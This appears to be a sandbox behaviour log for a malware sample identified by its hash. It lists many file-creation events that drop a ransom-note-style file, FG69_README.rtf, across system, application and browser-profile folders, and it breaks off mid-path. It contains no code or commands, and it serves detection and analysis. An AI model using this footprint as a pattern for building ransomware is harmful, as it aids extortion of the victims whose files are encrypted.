C:\Users\Admin\Music\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Public\Recorded TV\Sample Media\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Public\Desktop\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\bin\server\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\Favorites\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Roaming\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Recovery\19050942-cd11-11ea-8b14-46f8a7600ebe\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\Favorites\Links for United States\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Public\Videos\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\Favorites\Microsoft Websites\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2ulz21c5.default-release\storage\default\moz-extension+++355a24d0-6cfc-4451-9595-11d186f69ab7^userContextId=4294967295\idb\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G9Q5MRQ4\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\management\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\db\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Mozilla Firefox\fonts\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\4AO3J8KQ\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zalsryvg.Admin\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2ulz21c5.default-release\cache2\entries\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Public\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2ulz21c5.default-release\storage\permanent\chrome\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\deploy\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Mozilla Firefox\browser\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2ulz21c5.default-release\storage\default\moz-extension+++355a24d0-6cfc-4451-9595-11d186f69ab7^userContextId=4294967295\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\Desktop\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\Pictures\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files 